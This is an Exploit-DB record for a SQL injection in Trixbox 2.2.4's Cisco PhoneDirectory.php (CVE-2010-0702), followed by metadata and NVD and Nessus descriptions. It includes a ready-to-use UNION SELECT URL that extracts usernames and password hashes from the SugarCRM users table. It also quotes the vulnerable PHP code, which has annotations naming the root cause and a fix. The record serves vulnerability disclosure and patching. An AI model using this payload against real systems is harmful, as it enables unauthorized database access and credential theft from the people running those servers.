ID EDB-ID:11508 Type exploitdb Reporter NorSlacker Modified 2010-02-19T00:00:00
Description
Trixbox PhoneDirectory.php SQL injection (CVE-2010-0702; the original advisory title misspells the file as "PhonecDirectory.php"). Webapps exploit for the PHP platform.
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]
Example (Grab users / password hashes from sugarcrm)
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
Vulnerable code in PhoneDirectory.php (the ID request parameter is placed into the SQL string without escaping):
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
#
# NOTE(review): how $ID is populated from the request is not shown in this
# excerpt (presumably register_globals or an import of $_GET; confirm against
# the full file). No validation or escaping of $ID is visible before it is used.
if ($ID) {
# Opening tag of the XML document returned to the phone.
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
# The query is assembled by string concatenation across the next three lines.
$Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
# Root cause: $ID is interpolated verbatim between single quotes, so a quote
# character in the parameter ends the string literal and the remainder of the
# value is parsed as SQL.
# Fix: bind the value with a prepared statement (mysqli or PDO). With the legacy
# mysql_* API used here, at minimum pass it through mysql_real_escape_string()
# and reject values that do not match the expected id format.
$Query .= "FROM contacts WHERE id = '$ID' ";
$Query .= "ORDER BY last_name ";
# The assembled string is sent unchanged over the $ConnectionSuccess link.
# ext/mysql has no parameter binding and was removed in PHP 7.0.
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
# (remainder of the block is elided in the advisory)
...
}
#norslacker [at] gmail [dot] com
{"hash": "28ebccc8412850579d4566fb49664197a37aebfb12cc1c40859e1bc37ee3092a", "id": "EDB-ID:11508", "lastseen": "2016-02-01T14:27:43", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/11508/", "description": "Trixbox PhonecDirectory.php SQL Injection. CVE-2010-0702. Webapps exploit for php platform", "title": "Trixbox 2.2.4 - PhonecDirectory.php SQL Injection", "sourceData": "# Software Link: http://trixbox.org/downloads\r\n# Version: 2.2.4\r\n# Code : \r\nhttp://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]\r\n\r\nExample (Grab users / password hashes from sugarcrm) \r\nhttp://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id\r\n\r\n\r\nPhoneDirectory.php vulnerable code:\r\n# If the variable \"ID\" is passed in through the GET string, then display\r\n# extension, phone number and cell phone number for that record with the dial\r\n# key functionality\r\nif ($ID) {\r\n $PersonDirectoryListing = \"<CiscoIPPhoneDirectory>\\n\";\r\n\r\n $Query = \"SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other \";\r\n $Query .= \"FROM contacts WHERE id = '$ID' \";\r\n $Query .= \"ORDER BY last_name \";\r\n $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);\r\n\r\n ...\r\n\r\n}\r\n\r\n#norslacker [at] gmail [dot] com", "objectVersion": "1.0", "cvelist": ["CVE-2010-0702"], "published": "2010-02-19T00:00:00", "osvdbidlist": ["62572"], "references": [], "reporter": "NorSlacker", "modified": "2010-02-19T00:00:00", "href": "https://www.exploit-db.com/exploits/11508/"}
{"result": {"cve": [{"id": "CVE-2010-0702", "type": "cve", "title": "CVE-2010-0702", "description": "SQL injection vulnerability in cisco/services/PhonecDirectory.php in Fonality Trixbox 2.2.4 allows remote attackers to execute arbitrary SQL commands via the ID parameter.", "published": "2010-02-23T15:30:01", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0702", "cvelist": ["CVE-2010-0702"], "lastseen": "2017-08-17T11:14:43"}], "nessus": [{"id": "TRIXBOX_CISCO_PHONEDIRECTORY_ID_SQLI.NASL", "type": "nessus", "title": "trixbox Cisco Phone Services PhoneDirectory.php ID Parameter SQL Injection", "description": "The version of the Cisco Phone Services phone directory script ('cisco/services/PhoneDirectory.php') installed as part of the web interface for trixbox (or Asterisk@Home, as it was formerly known) and hosted on the remote web server fails to sanitize input to the 'ID' parameter before using it in a database query.\n\nProvided PHP's 'magic_quotes_gpc' setting is disabled, an unauthenticated, remote attacker can leverage this issue to manipulate SQL queries and, for example, uncover sensitive information from the associated database, read arbitrary files, or execute arbitrary PHP code.", "published": "2010-02-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=44875", "cvelist": ["CVE-2010-0702"], "lastseen": "2017-10-29T13:42:25"}]}}